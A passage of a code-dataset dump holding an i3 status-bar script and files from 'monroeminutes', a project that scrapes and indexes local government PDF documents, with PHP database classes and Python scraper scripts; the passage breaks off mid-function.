"text": "#!/bin/sh\n# shell script to prepend i3status with more stuff\n\ni3status -t | while :\ndo\n read line\n output=$(python /home/ds/.i3/status.py)\n /bin/echo \"$output | $line\" || exit 1\ndone\n"
},
{
"alpha_fraction": 0.6281920075416565,
"alphanum_fraction": 0.6588355302810669,
"avg_line_length": 35.25925827026367,
"blob_id": "05beb9434722020d9c7beb70f5713aeb3b1a5f7f",
"content_id": "54edaf116e517fc3d882ab00bc0ab50211c57e94",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 979,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 27,
"path": "/i3gaps/status.py",
"repo_name": "davebs/daves-linux-configs",
"src_encoding": "UTF-8",
"text": "from datetime import timedelta\nimport psutil\nimport subprocess\n\n# strip and format uptime values out of uptime output\nwith open('/proc/uptime', 'r') as f:\n uptime_seconds = float(f.readline().split()[0])\n uptime_string = str(timedelta(seconds = uptime_seconds))\n uptime_string = uptime_string.split(':')[:2]\n uptime_string = ''.join(uptime_string[0].split(',')) + \\\n ' hours ' + uptime_string[1] + ' minutes'\n\n# I want to add GPU info at some point with values scraped\n# out of nvidia-smi\n#data = subprocess.check_output('/usr/bin/nvidia-smi', '')\n\n# figure out how much memory we're using\nmemory = psutil.virtual_memory()\nmemory = format(memory.used/1000000000, ',.1f') + \\\n '/' + format(memory.total/1000000000, ',.1f') + \\\n 'gb (' + str(memory.percent) + '%)'\n\n# the following text ends up on your i3bar\n# TODO: Make downspeed and upspeed accurate\nprint \"Uptime: %s | Mem Used: %s | Down: 0kb | Up: 0kb\" % (uptime_string, memory)\n\nexit(0)\n"
}
] | 3 |
hhroc/monroeminutes | https://github.com/hhroc/monroeminutes | 583cfa81ba369cf4f097aebd2601413ad57d729e | 04bebb81fd46a88b6d778f17454da03036577191 | b4c5b2cabcfa3fdb464b2656c1064acafd31c535 | refs/heads/master | 2021-01-23T20:39:23.711825 | 2013-06-04T19:33:29 | 2013-06-04T19:33:29 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5628342032432556,
"alphanum_fraction": 0.5635026693344116,
"avg_line_length": 23.129032135009766,
"blob_id": "d9fcab0ce975a2facd040afb0f7f5667fd47778d",
"content_id": "e007d6855781bfe33853bd068d8ff879d29d4d74",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2992,
"license_type": "no_license",
"max_line_length": 155,
"num_lines": 124,
"path": "/web/tools/OrganizationsManager.class.php",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "<?\n\n\trequire_once(\"DatabaseTool.class.php\");\n\n\tclass OrganizationsManager\n\t{\n\t\tfunction add($name,$type,$websiteurl)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'INSERT INTO organizations(name,type,websiteurl) VALUES(?,?,?)';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"sss\", $name,$type,$websiteurl);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$row = $results[0];\n\t\t\t\t$retVal = (object) array('organizationid' => $row['organizationid'],'name' => $row['name'],'type' => $row['type'],'websiteurl' => $row['websiteurl']);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retVal;\n\t\t}\n\n\t\tfunction get($organizationid)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'SELECT * FROM organizations WHERE organizationid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"s\", $organizationid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$row = $results[0];\n\t\t\t\t$retVal = (object) array('organizationid' => $row['organizationid'],'name' => $row['name'],'type' => $row['type'],'websiteurl' => $row['websiteurl']);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retVal;\n\t\t}\n\n\t\tfunction getall()\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'SELECT * FROM organizations';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$retArray = array();\n\t\t\t\tforeach( $results as $row )\n\t\t\t\t{\n\t\t\t\t\t$object = (object) array('organizationid' => $row['organizationid'],'name' => $row['name'],'type' => $row['type'],'websiteurl' => $row['websiteurl']);\n\t\t\t\t\t$retArray[] = $object;\n\t\t\t\t}\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retArray;\n\t\t}\n\n\t\tfunction del($organizationid)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'DELETE FROM organizations WHERE organizationid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"s\", $organizationid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t}\n\n\t\tfunction update($name,$type,$websiteurl)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'UPDATE organizations SET name = ?,type = ?,websiteurl = ? WHERE organizationid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"ssss\", $name,$type,$websiteurl, $organizationid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t}\n\n\t\t///// Application Specific Functions\n\n\t}\n\n?>\n"
},
{
"alpha_fraction": 0.5085910558700562,
"alphanum_fraction": 0.5137457251548767,
"avg_line_length": 15.19444465637207,
"blob_id": "fe6a0994adc1e1190b037c75ab2a0b00bc5728d5",
"content_id": "405759bd590493292b75df4cff2119361f846453",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 582,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 36,
"path": "/web/api/preview.php",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "<?\n\t\n\t$docid = $_GET['docid'];\n\t$keyword = $_GET['keyword'];\n\t\n\t// default values\n\t$error = \"Invalid document ID\";\n\t$preview = \"\";\n\t\n\tif( is_numeric($docid) == True )\n\t{\n\t\trequire_once(\"../tools/DocumenttextsManager.class.php\");\n\t\t\n\t\t$dtmgr = new DocumenttextsManager();\n\t\t\n\t\t$doctext = $dtmgr->getbydocid($docid);\n\t\t\n\t\tif( $doctext != \"\" )\n\t\t{\n\t\t\t$error = \"None\";\n\t\t\t\n\t\t\tif( strlen($doctext) > 512 )\n\t\t\t{\n\t\t\t\t//if( strpos($doctext,$keyword) < )\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\t$preview = $doctext;\n\t\t\t}\n\t\t}\n\t}\n\n\t\n\techo '{\"\"error\" : \"' . $error . '\", \"previewtext\" : \"' . $preview . '\"}';\n\n?>"
},
{
"alpha_fraction": 0.5324675440788269,
"alphanum_fraction": 0.5333951711654663,
"avg_line_length": 30.647058486938477,
"blob_id": "3fc1f24389b57d8acc52a562e8cedd58a95a8edb",
"content_id": "756260f748f03e173f3a01265b51cf59ddeda727",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2156,
"license_type": "no_license",
"max_line_length": 183,
"num_lines": 68,
"path": "/scripts/orphans.py",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "import MySQLdb as mdb\nimport _mysql as mysql\nimport re\n\nclass orphans:\n\n __settings = {}\n __con = False\n\n def __init__(self):\n configfile = \"sqlcreds.txt\"\n f = open(configfile)\n for line in f:\n # skip comment lines\n m = re.search('^\\s*#', line)\n if m:\n continue\n\n # parse key=value lines\n m = re.search('^(\\w+)\\s*=\\s*(\\S.*)$', line)\n if m is None:\n continue\n\n self.__settings[m.group(1)] = m.group(2)\n f.close()\n\n # create connection\n self.__con = mdb.connect(host=self.__settings['host'], user=self.__settings['username'], passwd=self.__settings['password'], db=self.__settings['database'])\n\n def add(self,orphanid,url,orphandt,scrapeurlid,organizationid):\n with self.__con:\n cur = self.__con.cursor()\n cur.execute(\"INSERT INTO orphans(orphanid,url,orphandt,scrapeurlid,organizationid) VALUES(%s,%s,%s,%s,%s)\",(orphanid,url,orphandt,scrapeurlid,organizationid))\n cur.close()\n newid = cur.lastrowid\n return newid\n\n def get(self,):\n with self.__con:\n cur = self.__con.cursor()\n cur.execute(\"SELECT * FROM orphans WHERE = %s\",())\n row = cur.fetchone()\n cur.close()\n\n def getall(self):\n with self.__con:\n cur = self.__con.cursor()\n cur.execute(\"SELECT * FROM orphans\")\n rows = cur.fetchall()\n cur.close()\n\n _orphans = []\n for row in rows:\n _orphans.append(row)\n\n return _orphans\n\n def delete(self,):\n with self.__con:\n cur = self.__con.cursor()\n cur.execute(\"DELETE FROM orphans WHERE = %s\",())\n cur.close()\n\n def update(self,orphanid,url,orphandt,scrapeurlid,organizationid):\n with self.__con:\n cur = self.__con.cursor()\n cur.execute(\"UPDATE orphans SET orphanid = %s,url = %s,orphandt = %s,scrapeurlid = %s,organizationid = %s WHERE = %s\",(orphanid,url,orphandt,scrapeurlid,organizationid,))\n cur.close()\n\n\n\n\n"
},
{
"alpha_fraction": 0.577751874923706,
"alphanum_fraction": 0.5859056711196899,
"avg_line_length": 27.85714340209961,
"blob_id": "5913f0a30aecfcc8b9b8c0adb9b51f3442d73576",
"content_id": "be049d8d1b974d996e493ca9b0923ffb208ecdd8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3434,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 119,
"path": "/scripts/generateignorelist.py",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "import sys\nimport os\nfrom random import randint\nfrom bs4 import BeautifulSoup\nimport urllib\nimport urllib2\nimport datetime\nimport magic\n\nfrom scrapeurls import scrapeurls\nfrom ignoreurls import ignoreurls\n\ndef report(type,text):\n if type == \"info\":\n type = \"INFO \"\n elif type == \"warning\":\n type = \"WARNING\"\n elif type == \"error\":\n type = \"ERROR \"\n else:\n type = \"OTHER \"\n print \"[{0}] {1}\".format(type,text)\n\ndef get_url_list():\n surls = scrapeurls()\n urls = surls.getall()\n return urls\n\ndef get_ignore_list():\n iurls = ignoreurls()\n urls = iurls.getall()\n retval = []\n for url in urls:\n ignoreurlid,ignoreurl,ignoredt,scrapeurlid = url\n retval.append(ignoreurl)\n return urls\n\ndef get_page_links(url):\n html = urllib2.urlopen(url)\n soup = BeautifulSoup(html)\n atags = soup.find_all('a', href=True)\n return atags\n\ndef decode_link_url(tag,siteurl,baseurl):\n # make sure the URL is formatted correctly\n if tag['href'][0:7].lower() == \"http://\":\n linkurl = tag['href']\n else:\n if tag['href'][0:1] == \"/\":\n # absolute link\n linkurl = siteurl + tag['href']\n else:\n # relative link\n linkurl = baseurl + tag['href']\n return linkurl\n\ndef download_link(url):\n # get the filename off of the url, then set the local file to that + a random number .pdf, and download it\n urlfile = url[url.rfind(\"/\")+1:]\n _filename = \"./downloads/{0}_{1}.download\".format(urlfile,randint(0,1000000))\n filename,headers = urllib.urlretrieve(url,_filename)\n return filename\n\ndef add_to_ignore_list(link,scrapeurlid):\n dt = datetime.datetime.now().date().isoformat()\n iurls = ignoreurls()\n iurls.add(link,dt,scrapeurlid)\n\ndef check_if_pdf(filename):\n result = magic.from_file(filename,mime=True)\n report(\"info\",\"File Type = {0}\".format(result))\n return (result == 'application/pdf')\n\ndef delete_file(filename):\n os.remove(filename)\n\ndef main(argv):\n\n print \"\\nStarting Application ...\\n\"\n\n urls = get_url_list();\n\n report(\"info\",\"Processing {0} scraper URL's\".format(len(urls)))\n\n for _url in urls:\n scrapeurlid,url,name,organizationid,enabled = _url\n \n if enabled == False:\n continue\n\n # decode the base url and site url\n baseurl = url[:url.rfind(\"/\")+1]\n siteurl = url[:url.find(\"/\",7)]\n\n # get all of the links from the page\n links = get_page_links(url)\n report(\"info\",\"{0} page links found on {1}\".format(len(links),url))\n\n # iterate through the list of links and deturmine which ones are not PDFs\n for _link in links:\n ignorelist = get_ignore_list()\n \n link = decode_link_url(_link,siteurl,baseurl)\n \n # make sure that it isn't already in the list\n if not (link in ignorelist):\n filename = download_link(link)\n success = check_if_pdf(filename)\n delete_file(filename)\n \n if success == True:\n report(\"info\",\"PDF Found at `{0}`.\".format(link))\n else:\n add_to_ignore_list(link,scrapeurlid)\n report(\"info\",\"Added `{0}` to ignore list.\".format(link))\n \n print \"\\nExiting Application ...\\n\"\n\nif __name__ == '__main__': sys.exit(main(sys.argv))\n"
},
{
"alpha_fraction": 0.6804733872413635,
"alphanum_fraction": 0.6804733872413635,
"avg_line_length": 22.34482765197754,
"blob_id": "a0eb5e375a48824f3a7006619a908150f34961e9",
"content_id": "ad65d1e43bb7389bb7359dfe6472c2fac09b326e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 676,
"license_type": "no_license",
"max_line_length": 175,
"num_lines": 29,
"path": "/web/about.php",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "<?php\n\trequire_once(\"_header.php\");\n?>\n\n\n\tMonroe Minutes is a aggregator of various different types of documents from various organizations whithin Monroe County, NY. MonroeMinutes.org pulls documents from \n\t<?php\n\t\n\t\t// TODO: get number of Organizations\n\t\techo \"####\";\n\t\n\t?>\n\t organizations located in \n\t<?php\n\t\n\t\t// TODO: get number of Bodies\n\t\techo \"####\";\n\t\n\t?>\n\t towns, villages, and cities within Monroe County, NY!<br>\n\t <br>\n\t For more information on how Monroe Minutes works, how to use it's features, and how you can help make Monroe Minutes better check out the <a href=\"about.php\">About Page</a>.\n\n\n\t<!-- Put Code Here -->\n\n<?php\n\trequire_once(\"_footer.php\");\n?>"
},
{
"alpha_fraction": 0.5185185074806213,
"alphanum_fraction": 0.5185185074806213,
"avg_line_length": 11.11111068725586,
"blob_id": "62fe5578ae81affa2096c041c9415cba1d064cee",
"content_id": "5d8f4c35ce124aa0d6d245446c1f91daa21653c9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 108,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 9,
"path": "/web/admin/logout.php",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "<?php\n\trequire_once(\"../_header.php\");\n?>\n\n\t<!-- Logout Page -->\n\t\n<?php\n\trequire_once(\"../_footer.php\");\n?>"
},
{
"alpha_fraction": 0.5769017338752747,
"alphanum_fraction": 0.5777345895767212,
"avg_line_length": 23.33783721923828,
"blob_id": "443bd74d584a13510a4136d353f19aa29476b016",
"content_id": "b0e322c77ddfd639e6ae3665dfe5a9a1a26a1100",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 3602,
"license_type": "no_license",
"max_line_length": 148,
"num_lines": 148,
"path": "/web/tools/DocumenttextsManager.class.php",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "<?\n\n\trequire_once(\"DatabaseTool.class.php\");\n\n\tclass DocumenttextsManager\n\t{\n\t\tfunction add($documentid,$documenttext)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'INSERT INTO documenttexts(documentid,documenttext) VALUES(?,?)';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"ss\", $documentid,$documenttext);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$row = $results[0];\n\t\t\t\t$retVal = (object) array('documenttextid' => $row['documenttextid'],'documentid' => $row['documentid'],'documenttext' => $row['documenttext']);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retVal;\n\t\t}\n\n\t\tfunction get($documenttextid)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'SELECT * FROM documenttexts WHERE documenttextid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"s\", $documenttextid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$row = $results[0];\n\t\t\t\t$retVal = (object) array('documenttextid' => $row['documenttextid'],'documentid' => $row['documentid'],'documenttext' => $row['documenttext']);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retVal;\n\t\t}\n\n\t\tfunction getall()\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'SELECT * FROM documenttexts';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$retArray = array();\n\t\t\t\tforeach( $results as $row )\n\t\t\t\t{\n\t\t\t\t\t$object = (object) array('documenttextid' => $row['documenttextid'],'documentid' => $row['documentid'],'documenttext' => $row['documenttext']);\n\t\t\t\t\t$retArray[] = $object;\n\t\t\t\t}\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retArray;\n\t\t}\n\n\t\tfunction del($documenttextid)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'DELETE FROM documenttexts WHERE documenttextid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"s\", $documenttextid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t}\n\n\t\tfunction update($documentid,$documenttext)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'UPDATE documenttexts SET documentid = ?,documenttext = ? WHERE documenttextid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"sss\", $documentid,$documenttext, $documenttextid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . 
$e->getMessage() );\n\t\t\t}\n\t\t}\n\n\t\t///// Application Specific Functions\n\n\t\tfunction getbydocid($docid)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'SELECT * FROM documenttexts WHERE documentid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"s\", $documenttextid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$row = $results[0];\n\t\t\t\t$retVal = (object) array('documenttextid' => $row['documenttextid'],'documentid' => $row['documentid'],'documenttext' => $row['documenttext']);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retVal;\n\t\t}\n\n\t}\n\n?>\n"
},
{
"alpha_fraction": 0.5966386795043945,
"alphanum_fraction": 0.5966386795043945,
"avg_line_length": 12.333333015441895,
"blob_id": "e9d870e09be7ff90dac0bab82d69424d23963c65",
"content_id": "1db47648d5d6130d9a218b5d9067c6cff63beb81",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 119,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 9,
"path": "/web/index.php",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "<?php\n\trequire_once(\"_header.php\");\n?>\n\n\t<a href=\"search.php\">Go To Search</a>\n\t\n<?php\n\trequire_once(\"_footer.php\");\n?>"
},
{
"alpha_fraction": 0.5931307673454285,
"alphanum_fraction": 0.5944517850875854,
"avg_line_length": 27.037036895751953,
"blob_id": "1717aa0f203956fa77f08891efad5e8c477ece40",
"content_id": "7ac1d0067caae3906b58d9cde56f3b40112a6972",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1514,
"license_type": "no_license",
"max_line_length": 246,
"num_lines": 54,
"path": "/scripts/decodepdf.py",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "from pdfminer.pdfinterp import PDFResourceManager, process_pdf\nfrom pdfminer.converter import TextConverter\nfrom pdfminer.layout import LAParams\n\nimport hashlib\n\nfrom cStringIO import StringIO\n\nfrom suborganizations import suborganizations\n\ndef _pdf_to_text(path):\n\n try:\n rsrcmgr = PDFResourceManager()\n retstr = StringIO()\n codec = 'ascii'\n laparams = LAParams()\n laparams.all_texts = True\n device = TextConverter(rsrcmgr, retstr, codec=codec, laparams=laparams)\n\n with open(path, 'rb') as fp:\n process_pdf(rsrcmgr, device, fp)\n device.close()\n\n # fix the non-utf8 string ...\n result = retstr.getvalue()\n txt = result.encode('ascii','ignore')\n\n retVal = (txt,True)\n retstr.close()\n\n except Exception,e:\n #print str(e)\n #print \"\\tERROR: PDF is not formatted correctly, aborting.\"\n retVal = (\"\", False)\n pass\n\n return retVal\n\ndef scrubtext(text):\n scrubstr = text.replace(',','').replace('.','').replace('?','').replace('/',' ').replace(':','').replace(';','').replace('<','').replace('>','').replace('[','').replace(']','').replace('\\\\',' ').replace('\"','').replace(\"'\",'').replace('`','')\n\n return scrubstr\n\ndef decodepdf(path):\n\n pdftext,success = _pdf_to_text(path)\n #pdftext = _scrub_text(pdftext)\n\n texthash = \"\"\n if success == True:\n texthash = hashlib.md5(pdftext).hexdigest()\n \n return success,pdftext,texthash\n"
},
{
"alpha_fraction": 0.514018714427948,
"alphanum_fraction": 0.514018714427948,
"avg_line_length": 11,
"blob_id": "029b4be68e32298b9254c5725b11282e24db9697",
"content_id": "88066615203c9ec8af48bf4c4528663b8338449c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 107,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 9,
"path": "/web/admin/login.php",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "<?php\n\trequire_once(\"../_header.php\");\n?>\n\n\t<!-- Login Page -->\n\t\n<?php\n\trequire_once(\"../_footer.php\");\n?>"
},
{
"alpha_fraction": 0.594558835029602,
"alphanum_fraction": 0.6030882596969604,
"avg_line_length": 32.663368225097656,
"blob_id": "27f43849642cb6680eef4abbed31f2bbbb55b6a1",
"content_id": "7b89881873f3ed56c6728d645368f7d8024f64be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6800,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 202,
"path": "/scripts/simplescraper.py",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "import os\nimport sys\nimport datetime\nimport time\nimport urllib\nimport urllib2\nfrom random import randint\nfrom bs4 import BeautifulSoup\nfrom pprint import pprint\nimport nltk\n\nfrom decodepdf import decodepdf,scrubtext\n\nfrom scrapeurls import scrapeurls\nfrom ignoreurls import ignoreurls\nfrom suborganizations import suborganizations\nfrom documents import documents\nfrom documenttexts import documenttexts\nfrom words import words\n\ndef report(type,text):\n if type == \"info\":\n type = \"INFO \"\n elif type == \"warning\":\n type = \"WARNING\"\n elif type == \"error\":\n type = \"ERROR \"\n else:\n type = \"OTHER \"\n print \"[{0}] {1}\".format(type,text)\n\ndef getorgurls(orgid):\n surls = scrapeurls()\n urls = surls.geturls(orgid)\n return urls\n\ndef getlinks(urlid,url,siteurl,baseurl):\n iurls = ignoreurls()\n ignorelinks = iurls.getallbyscrapeurlid(urlid)\n\n _pagelinks = _get_page_links(url)\n\n pagelinks = []\n for pagelink in _pagelinks:\n link = decodelink(pagelink,siteurl,baseurl)\n pagelinks.append((link.lower(),pagelink.get_text().strip()))\n\n # diff the lists, dropping links from the ignore list\n links = [x for x in pagelinks if x not in ignorelinks]\n\n #print \"len(ignorelinks) = {0}\".format(len(ignorelinks))\n #pprint(ignorelinks)\n #print \"\\n\\n\"\n #print \"len(pagelinks) = {0}\".format(len(pagelinks))\n #pprint(pagelinks)\n #print \"\\n\\n\"\n #print \"len(links) = {0}\".format(len(links))\n #pprint(links)\n #print \"\\n\\n\"\n\n return links\n\ndef _get_page_links(url):\n html = urllib2.urlopen(url)\n soup = BeautifulSoup(html)\n atags = soup.find_all('a', href=True)\n return atags\n\ndef decodelink(tag,siteurl,baseurl):\n #try:\n # make sure the URL is formatted correctly\n #print type(tag)\n #print \"decoding: {0}\".format(tag['href'])\n if len(tag['href']) >= 7 and tag['href'][0:7].lower() == \"http://\":\n linkurl = tag['href']\n #print \"1: {0}\".format(linkurl)\n else:\n if len(tag['href']) >= 1 and tag['href'][0:1] == \"/\":\n # absolute link\n linkurl = siteurl + tag['href']\n #print \"2: {0}\".format(linkurl)\n else:\n # relative link\n linkurl = baseurl + tag['href']\n #print \"3: {0}\".format(linkurl)\n #except:\n # linkurl = \"\"\n return linkurl\n\ndef downloadlink(url):\n try:\n # get the filename off of the url, then set the local file to that + a random number .pdf, and download it\n urlfile = url[url.rfind(\"/\")+1:]\n _filename = \"./downloads/{0}_{1}.download\".format(urlfile,randint(0,1000000))\n filename,headers = urllib.urlretrieve(url,_filename)\n success = True\n except:\n success = False\n filename = \"\"\n return success,filename\n\ndef addignore(link,scrapeurlid):\n dt = datetime.datetime.now().date().isoformat()\n iurls = ignoreurls()\n iurls.add(link,dt,scrapeurlid)\n\ndef getsuborg(pdfheader,orgid):\n sorgs = suborganizations()\n suborgs = sorgs.getall()\n #print \"orgid = {0}\".format(orgid)\n success = False\n for suborg in suborgs:\n suborganizationid,organizationid,name,parsename,websiteurl,documentsurl,scriptname,dbpopulated = suborg\n #pprint(suborg)\n if int(orgid) == int(organizationid):\n #print \"parsename = {0}\\n\".format(parsename.lower())\n #print \"header = {0}\\n\\n\\n\".format(pdfheader.lower())\n if parsename.lower() in pdfheader.lower():\n success = True\n break\n return success,suborganizationid\n\ndef getdocdate(pdfheader):\n # TODO: parse the header to get the date\n return \"1970-1-1\"\n\ndef getdocname(pdfheader):\n # TODO: parse the header to get the name\n return \"document\"\n\ndef 
savedoc(suborgid,orgid,sourceurl,documentdate,name,dochash,pdftext,tokens,orphaned):\n    scrapedate = time.strftime('%Y-%m-%d')\n    doc = documents()\n    docid = doc.add(suborgid,orgid,sourceurl,documentdate,scrapedate,name,dochash,orphaned)\n    doct = documenttexts()\n    doct.add(docid,pdftext)\n    wrds = words()\n    for token,frequency in tokens.items():\n        if len(token) > 3:\n            wrds.add(docid,suborgid,orgid,token,frequency)\n    return docid\n\ndef main(argv):\n    print \"\\nApplication Started ...\\n\"\n\n    # edit this to change the size of the pdf to look at as the header\n    HEADERLENGTH = 2048\n\n    if len(argv) != 2:\n        print \"Usage:\\n\\tpython simplescraper.py <orgid>\"\n        return\n    \n    orgid = argv[1]\n\n    urls = getorgurls(orgid)\n\n    report(\"info\",\"Organization has {0} URLS.\".format(len(urls)))\n\n    for _url in urls:\n        urlid,url = _url\n        \n        # decode the base url and site url\n        baseurl = url[:url.rfind(\"/\")+1]\n        siteurl = url[:url.find(\"/\",7)+1]\n\n        links = 